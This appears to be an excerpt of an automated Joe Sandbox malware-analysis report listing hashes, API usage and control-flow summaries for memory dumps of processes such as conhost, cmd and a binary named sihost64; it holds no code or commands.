                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                                          • Instruction ID: f10d360651732e249677b5e8dac237642a64e3347f95cf247477c71035fc8a12
                                                                                                                                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                                          • Instruction Fuzzy Hash: 3131743230CA088BFF54BA589C596AAB3D7EBE4311F011169EC4BC31C6D974ED4647C1

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Control-flow graph (rendered graph not preserved; executed/not-executed block colouring lost): function at 21e7b55d2af, basic blocks 265-282; Windows API called: LoadLibraryA; internal calls to 21e7b55f85e
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021E7B340000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_21e7b340000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                                                                                                          • Instruction ID: 4f2b4ab163533bc30425782d10dfe3c1e4cf0d6d09df0c31d3d44dd164bd6394
                                                                                                                                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                                                                                                          • Instruction Fuzzy Hash: DD315032308A084BEF64FA589C5969AB3D7EBE8321F0102699C5BC72C9DE74DD468781

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Control-flow graph (rendered graph not preserved; executed/not-executed block colouring lost): function at 21e7b55d2a2, basic blocks 286-304; Windows API called: LoadLibraryA; internal calls to 21e7b55f85e
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021E7B340000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_30_2_21e7b340000_conhost.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                                                                                                          • Instruction ID: 17d3826ecc73368d808190cc0f09ef7c2122cc843a2e0d464871bee1817a7987
                                                                                                                                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                                                                                                          • Instruction Fuzzy Hash: 42E0D83120CA0D1FFB68E59DDC4A7F666D8DBA5272F00006EE949C2181E055D8924391

Control-flow Graph

Control-flow graph summary: 7 basic blocks spanning 7ff7c14e0120-7ff7c14e141e with no API calls. The entry block 7ff7c14e0120-7ff7c14e12d1 optionally executes 7ff7c14e12d3-7ff7c14e12d4 before 7ff7c14e12db-7ff7c14e1341, which branches either through 7ff7c14e1343-7ff7c14e1346 and 7ff7c14e1350-7ff7c14e1395 or through 7ff7c14e1397-7ff7c14e13e2; both paths rejoin at 7ff7c14e13e9-7ff7c14e141e.
Memory Dump Source
• Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 25da1aa04ab5727179b3b2d1831e77843421215692aa40101df9865b9d7de8e3
• Instruction ID: 0d01fc6f68b1608566ab0ad2364fa8307efb0d5016093eda65f8bd6061bfb0f3
• Opcode Fuzzy Hash: 25da1aa04ab5727179b3b2d1831e77843421215692aa40101df9865b9d7de8e3
• Instruction Fuzzy Hash: 11510760A1CA854FE744FB7C44692BEBBD1EF5D760F4406BDE08EC7293CD28A8028345

Control-flow Graph

Memory Dump Source
• Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fa303efdbc59a9154b35b0b39ada17fbc735629aad42fa9fac50a79b828046ad
• Instruction ID: d47ab2a87398f4ab96d46184f92b5e56da4d6fa8ef4d8e22f10432322c50c392
• Opcode Fuzzy Hash: fa303efdbc59a9154b35b0b39ada17fbc735629aad42fa9fac50a79b828046ad
• Instruction Fuzzy Hash: E1510960A0CAC55FE745EB7C44696B9BBD1EF5E760F4406BDD08EC7293CD68A8028351

Control-flow Graph

Control-flow graph summary: 29 basic blocks spanning 7ff7c14e1092-7ff7c14e120a. The function is a chain of thirteen conditional branches (at 7ff7c14e1092, 10a2, 10bc, 10d4, 10ec, 1104, 111c, 1134, 114c, 1164, 117c, 1194 and 11ac), each of which either executes or skips a one-instruction block before falling into the next test. After the last test, 7ff7c14e11c4-7ff7c14e11e2 leads to 7ff7c14e11e9-7ff7c14e11ee, which calls 7ff7c14e0120, and the function ends at 7ff7c14e11f3-7ff7c14e120a.
Memory Dump Source
• Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 47205286c48692424956a70fb445376b8554d46509d3647aeecfdb326f525316
• Instruction ID: b19b13c6175829da8c7073eab8267e127e813a830899d09baf7c27fa35f0b4b3
• Opcode Fuzzy Hash: 47205286c48692424956a70fb445376b8554d46509d3647aeecfdb326f525316
• Instruction Fuzzy Hash: C251A22098E3C15FE307A3349C65A95BFA16F83764F5D81EAF0C5CE4B3C6AA4585C722

Control-flow Graph

Memory Dump Source
• Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ebb85ef3d92fd540be230d9a13673a7a1ee3215178b173db60383ea0d0b6db5
• Instruction ID: d532858fb535ada51ba602a92d509a5172091f20f1f1cf633afce208fc7854d5
• Opcode Fuzzy Hash: 2ebb85ef3d92fd540be230d9a13673a7a1ee3215178b173db60383ea0d0b6db5
• Instruction Fuzzy Hash: 7521D620B1D9C91FE786E7784429BBABFE1DF5A241B4485BDC0CEC76A3CC49A9468340

Control-flow Graph

Control-flow graph summary: 3 basic blocks in a straight line, 7ff7c14e0430-7ff7c14e047d, 7ff7c14e047f-7ff7c14e04b0 and 7ff7c14e04ba-7ff7c14e04d8, with no API calls.
Memory Dump Source
• Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 99fb05300054927506d4670d506b20679306d6034a16d96f63f67ab66861e55f
• Instruction ID: c4d4d72080007685bd7a0bf9bd463f554b12836b684d077c3cde4b21845cff21
• Opcode Fuzzy Hash: 99fb05300054927506d4670d506b20679306d6034a16d96f63f67ab66861e55f
• Instruction Fuzzy Hash: AE218E6190E6C91FE3269A342C256F6BFA0AF17210F4845FFD0C8871D7D8585D098763
Memory Dump Source
• Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b2cc6138563e84801ba5dc6141bcdfdac84aa01f2ba6a2ed21c50ef24bd95d86
• Instruction ID: 21b367143960ca03a63eaf6a07ef7432498e2b399907e5379a50ec0537a1e346
• Opcode Fuzzy Hash: b2cc6138563e84801ba5dc6141bcdfdac84aa01f2ba6a2ed21c50ef24bd95d86
• Instruction Fuzzy Hash: 8EF0C230A0E6CD6FD713AB7448683E57FE0DF1A200F4449FEC0C9D76A1C8196A5A8712
Memory Dump Source
• Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f266a1627395a20c4ed42b27e46c3a52d3f99a0be9d70c774b444c5dd021813e
• Instruction ID: b3169bf80605f88769a1cbacbf5ff622a104c84952cb67e926e7ec60da8877e7
• Opcode Fuzzy Hash: f266a1627395a20c4ed42b27e46c3a52d3f99a0be9d70c774b444c5dd021813e
• Instruction Fuzzy Hash: 3AF0BB2060E5C82FD347EBB44469665BFD1CF06151B8885EDD0C5D75B2C81A9A56C314
Memory Dump Source
• Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 35e2fe2a41aa6820833d9492312c05b24704ec7d56bda1dc6a91bf6c35fed18e
• Instruction ID: 49739c1aaa873272d71775f93aa472756d4ee8100d55d0764a0336f5ed39ff89
• Opcode Fuzzy Hash: 35e2fe2a41aa6820833d9492312c05b24704ec7d56bda1dc6a91bf6c35fed18e
• Instruction Fuzzy Hash: 59E02621B18C0D0F9A98F73C4445A69E2C2EFCC32074106B6E40CC3256DC28EC4183C0
Memory Dump Source
• Source File: 0000001E.00000002.1558716234.00007FF7C14E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C14E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7ff7c14e0000_conhost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4bf64cfe57d6468be794dbde03461101c8b8cb4933a4d5791a2db918d700d53b
• Instruction ID: 693896d65a26b81b3b0c2ddcdb051fbfcbfde541cf309b400123efd63bfd5668
• Opcode Fuzzy Hash: 4bf64cfe57d6468be794dbde03461101c8b8cb4933a4d5791a2db918d700d53b
• Instruction Fuzzy Hash: CBE0D8A1F1C8068FE358673C18152A5F791EF8A7A4F9082B9C04DC7182ED145C064351

Execution Graph

Execution Coverage: 29.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 15
Total number of Limit Nodes: 0

Execution graph summary (15 nodes): one path runs 4023f2 (calls _controlfp) -> 4010c4 (labelled "2 API calls") -> 402473. A second path runs 4022fa -> 40232c -> 40224f -> 402285 -> 4010c4 -> 402480 -> 4010e7 (calls memset) -> 40115b -> 401214 (calls sprintf) -> 4012bd -> 4022be -> 4023e5.

Callgraph

Callgraph summary: 69 functions, Function_00401000 through Function_00409E76. Function_004022FA calls Function_0040224F, which calls Function_004010C4, Function_00402158 and Function_004021EC; Function_004023F2 also calls Function_004010C4. Function_004010C4 calls Function_00401000, Function_004019D8, Function_00401C98, Function_00401D18, Function_00401D58 and Function_00401D98. Thirty-one functions spaced 0x40 bytes apart, Function_00401998 through Function_00402118, all call Function_004018EF, which calls Function_004014B4, which in turn calls Function_00401443 and Function_00401970. The remaining functions, including every Function_00409xxx entry, have no recorded calls.

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
Memory Dump Source
• Source File: 0000001F.00000002.1475026150.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.1474863638.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001F.00000002.1475192924.0000000000403000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001F.00000002.1475403092.0000000000409000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_sihost64.jbxd
Similarity
• API ID: memsetsprintf
• String ID: /sihost64
• API String ID: 4041149307-4205773068
• Opcode ID: 66d0c5e9331e1fd29723943745fff3ffa09bb61aa48dcd65c838924c585c62f8
• Instruction ID: 654ac478bb083c7dac971cee53f44a8cfd7553f7e00f020489cf52e211e71c4f
• Opcode Fuzzy Hash: 66d0c5e9331e1fd29723943745fff3ffa09bb61aa48dcd65c838924c585c62f8
• Instruction Fuzzy Hash: 69712961702B148DEB909B27DC5139A37A8B749BC8F804176EE4CA7B98EE3CCA44C744

Control-flow Graph (rendered figure not reproduced): basic blocks 401000-401045 (call 402478), 401048-401050, 401056-4010b4 and 4010b6-4010bb
Strings
• kz^)/-^gbp-ymn+(7nyp,[p(=eggazb/, xrefs: 00401098
Memory Dump Source
• Source File: 0000001F.00000002.1475026150.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.1474863638.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001F.00000002.1475192924.0000000000403000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001F.00000002.1475403092.0000000000409000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_sihost64.jbxd
Similarity
• API ID:
• String ID: kz^)/-^gbp-ymn+(7nyp,[p(=eggazb/
• API String ID: 0-1472292774
• Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
• Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
• Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
• Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744

Control-flow Graph (rendered figure not reproduced)
Memory Dump Source
• Source File: 0000001F.00000002.1475026150.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.1474863638.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001F.00000002.1475192924.0000000000403000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001F.00000002.1475403092.0000000000409000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_sihost64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 649b9d72e90635fd6e0d8deaa85bf926bf95cc7e5ac8ccbf387f1ba20e5a31cb
• Instruction ID: 58fa82481bd9f7f1a31c280291aa64e56759039c55656078795ddd0d8845b760
• Opcode Fuzzy Hash: 649b9d72e90635fd6e0d8deaa85bf926bf95cc7e5ac8ccbf387f1ba20e5a31cb
• Instruction Fuzzy Hash: E3212BA4301A148CEA80DB67DE5539937A4B74DFC8F80443AAF4CB73A5EEBCD9018358

Control-flow Graph (rendered figure not reproduced): single basic block 40224f-4022ca calling 402158, 4010c4 and 4021ec
Memory Dump Source
• Source File: 0000001F.00000002.1475026150.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.1474863638.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001F.00000002.1475192924.0000000000403000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001F.00000002.1475403092.0000000000409000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_sihost64.jbxd
Similarity
• API ID: memsetsprintf
• String ID:
• API String ID: 4041149307-0
• Opcode ID: 16194a66ee33a6762f6a3fd0038fd56a1c30afb807101148c998dcc1a079968f
• Instruction ID: 92290081071787e676730f83583c100b5cfe817de0e22f796d573c3dbb31d607
• Opcode Fuzzy Hash: 16194a66ee33a6762f6a3fd0038fd56a1c30afb807101148c998dcc1a079968f
• Instruction Fuzzy Hash: CA01A4B6701B588DDB40DF66DD9139837B4B309BC8F00482AAF5CA7B69DA78D6118748

Memory Dump Source
• Source File: 00000024.00000003.2321559898.00000236C6DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000236C6DC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_3_236c6dc0000_conhost.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
• Instruction ID: 5ca1e8f251caffc9e9ff743d2dff2833e08de6578b9c78d39a512240dddc4955
• Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
• Instruction Fuzzy Hash: 36915873B01258ABDB50AF29D41CB6D7399F744B94F49D4229F8B67788DA3CE902C708

Memory Dump Source
• Source File: 00000024.00000003.2321559898.00000236C6DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000236C6DC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_3_236c6dc0000_conhost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
• Instruction ID: adc27ef7e94b09abb97d16c73a7640ee48980d5f9c93d90bb65af2e12b6ae937
• Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
• Instruction Fuzzy Hash: 88D1C632A00744B9EB20EF65D45C79D77A8F784788F18A506EECB6B795DB38E280C704

Memory Dump Source
• Source File: 00000024.00000003.2321559898.00000236C6DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000236C6DC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_3_236c6dc0000_conhost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction ID: 80ff42cc9a2ce2996dc13df4609fcbabbcaa6d0ec3c716c3fd823bed6f11826f
• Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction Fuzzy Hash: 0C81D520A0024976F650BB26987D399239CAB85780F4CFD1799CB77396DB3CEB45CB18

Memory Dump Source
• Source File: 00000024.00000003.2321559898.00000236C6DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000236C6DC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_3_236c6dc0000_conhost.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
• Instruction ID: a8f131788aaa732ae3e78abe48e5c1cbda5a25741bcce6828493721a45ececf0
• Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
• Instruction Fuzzy Hash: E451A132100648BAEB74AF12916C35877A8E354BC4F1CA557EACB67B85CB3CE650D709

Memory Dump Source
• Source File: 00000024.00000003.2321559898.00000236C6DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000236C6DC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_3_236c6dc0000_conhost.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm
• API String ID: 3242871069-1018135373
• Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
• Instruction ID: be6cc4829ded1354040b1c877008fa0b7934c6e43afac26f17b71870f11fee1e
• Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
• Instruction Fuzzy Hash: 44510632311A04BADB64EB19D42CF2D7B99E340B84F09D926DAD753788D77CEA81C704

Memory Dump Source
• Source File: 00000024.00000003.2321559898.00000236C6DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000236C6DC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_3_236c6dc0000_conhost.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
• Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
• Instruction ID: e8c7ee9c173e1a606beae8f15878534c3c3ed522859cf8c5cf5fea2d4e3ab19c
• Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
• Instruction Fuzzy Hash: 1661E772504BC8A1DB31AF15E05C79AB7A4F784B84F089616EBDA27B95CB3CD290CB04

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002C.00000003.2323230226.0000015829E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000015829E70000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_44_3_15829e70000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 25b63bda3bbfe732e0150f733a63d47902f5e6ec503e1bd405d8c1a74775edcb
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: DC91477AB41950D7DBA48F25E8007ED7B91F784BD6F5481209E892B788DF74D892C701
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002C.00000003.2323230226.0000015829E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000015829E70000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_44_3_15829e70000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: a17128bee18a2e383ab3918215f13f4454979575fc103d91d8cebfc129b8a6a7
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: 0BD16D3A600B40E6EB60DB65D8813ED7BA0FBA97D9F100115DAC96BB96DFB4C1D1C702
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002C.00000003.2323230226.0000015829E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000015829E70000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_44_3_15829e70000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: b9c92120de296d520ebc26313a80fb0d2e7033fe2a5a7a067703e479d30de4bb
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: D981D438600E41E6FB509B659C433E92E91BBC57C2F45402599C87F7A6EFBAC9C2C742
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002C.00000003.2323230226.0000015829E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000015829E70000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_44_3_15829e70000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 226a7913e513cf6a09176819d400148314de8f9c9b25701aa4fc6ac6d86a6e46
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 30516F3A204A80EAEB748F21DD443E87BA0F7A4BD6F144515DAD96BB95CFB8C4D0C702
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002C.00000003.2323230226.0000015829E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000015829E70000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_44_3_15829e70000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 61b360a65391640be8b9b1b9bbc8836e9cee93b97405782d67717ce549fe0d55
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 3A51E43A311E40EADB54CB55D884BF83B91F3A4BCAF558511DAE96B788DFB8C881C701
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002C.00000003.2323230226.0000015829E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000015829E70000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_44_3_15829e70000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: e545374dc619337be9ac90d5ed978e6cbf42b64b261ee89bfb2423e452cae98f
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: 81617C36504BC4D5DB608B15E8403DABBA0FBD9BD5F044215EBD82BB95DFB8C190CB01
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000002D.00000003.2323889568.000001D643A60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D643A60000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_45_3_1d643a60000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: a0beed1ae675444847c231b09b34091c61a4ccc08fba2180db759f705ecc1130
